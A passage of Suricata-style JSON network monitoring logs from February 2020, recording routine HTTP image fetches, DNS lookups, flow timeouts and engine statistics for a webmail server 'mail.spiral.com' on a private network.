Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":5}} {"timestamp":"2020-02-29T00:21:17.587547+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512}} 
{"timestamp":"2020-02-29T00:21:17.587865+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:21:17.591276+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386}} {"timestamp":"2020-02-29T00:21:17.588965+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":1}} 
{"timestamp":"2020-02-29T00:21:17.589306+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465}} {"timestamp":"2020-02-29T00:21:17.591842+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.592157+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} 
{"timestamp":"2020-02-29T00:21:17.596746+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52944,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/data.png","state":"CLOSED","stored":false,"size":386,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.593362+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:21:17.594219+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.594991+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":3}} {"timestamp":"2020-02-29T00:21:17.595102+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:21:17.595491+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.595752+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/nag.png","state":"CLOSED","stored":false,"size":465,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.596037+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:21:17.597188+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":4}} {"timestamp":"2020-02-29T00:21:17.599969+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/add.png","state":"CLOSED","stored":false,"size":512,"tx_id":6}} {"timestamp":"2020-02-29T00:21:17.616058+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} 
{"timestamp":"2020-02-29T00:21:17.617498+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":7}} {"timestamp":"2020-02-29T00:21:17.617787+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:21:17.641243+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} 
{"timestamp":"2020-02-29T00:21:17.641296+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:21:17.641307+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:21:17.641313+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} 
{"timestamp":"2020-02-29T00:21:18.000736+0000","flow_id":826028198060941,"event_type":"flow","src_ip":"192.168.10.122","src_port":59430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:17.582541+0000","end":"2020-02-29T00:16:17.690881+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:21.000858+0000","flow_id":553916250233715,"event_type":"flow","src_ip":"192.168.10.122","src_port":57167,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:20.105331+0000","end":"2020-02-29T00:16:20.214280+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:22.000726+0000","flow_id":345374128613512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1903,"bytes_toclient":3289,"start":"2020-02-29T00:20:16.927880+0000","end":"2020-02-29T00:20:21.988124+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:22.598751+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":3}} {"timestamp":"2020-02-29T00:21:22.600626+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":2}} {"timestamp":"2020-02-29T00:21:22.602835+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52944,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":1}} 
{"timestamp":"2020-02-29T00:21:22.602932+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":5}} {"timestamp":"2020-02-29T00:21:22.622869+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":8}} 
{"timestamp":"2020-02-29T00:21:23.000179+0000","event_type":"stats","stats":{"uptime":14935,"capture":{"kernel_packets":137495,"kernel_drops":0},"decoder":{"pkts":137587,"bytes":94288945,"invalid":193,"ipv4":136034,"ipv6":10,"ethernet":137587,"raw":0,"null":0,"sll":0,"tcp":130520,"udp":5306,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2846,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2862,"synack":2853,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1881,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2428,"failed_udp":114},"tx":{"http":4829,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2510}},"flow_mgr":{"closed_pruned":2822,"new_pruned":17,"est_pruned":2482,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20170,"memcap_state":0,"memcap_global":0},"http":{"memuse":19094,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:23.001653+0000","flow_id":1056805396477246,"event_type":"flow","src_ip":"192.168.10.81","src_port":52928,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:20:16.980286+0000","end":"2020-02-29T00:20:22.782309+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:27.000286+0000","flow_id":600409286444339,"event_type":"flow","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":28,"pkts_toclient":28,"bytes_toserver":5065,"bytes_toclient":22432,"start":"2020-02-29T00:20:13.591155+0000","end":"2020-02-29T00:20:26.906913+0000","age":13,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:29.000441+0000","flow_id":1047128820218052,"event_type":"flow","src_ip":"192.168.10.122","src_port":60209,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:28.391364+0000","end":"2020-02-29T00:16:28.496615+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:21:30.000158+0000","event_type":"stats","stats":{"uptime":14942,"capture":{"kernel_packets":137592,"kernel_drops":0},"decoder":{"pkts":137604,"bytes":94290019,"invalid":193,"ipv4":136049,"ipv6":10,"ethernet":137604,"raw":0,"null":0,"sll":0,"tcp":130535,"udp":5306,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2846,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2862,"synack":2853,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1881,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2428,"failed_udp":114},"tx":{"http":4829,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2510}},"flow_mgr":{"closed_pruned":2825,"new_pruned":17,"est_pruned":2482,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19839,"memcap_state":0,"memcap_global":0},"http":{"memuse":19014,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:31.925724+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41965,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45535,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:32.037252+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41965,"proto":"UDP","dns":{"type":"answer","id":45535,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:32.037252+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41965,"proto":"UDP","dns":{"type":"answer","id":45535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:32.193317+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7394}} {"timestamp":"2020-02-29T00:21:33.000202+0000","flow_id":291687022764127,"event_type":"flow","src_ip":"192.168.10.122","src_port":50780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:32.237663+0000","end":"2020-02-29T00:16:32.345816+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
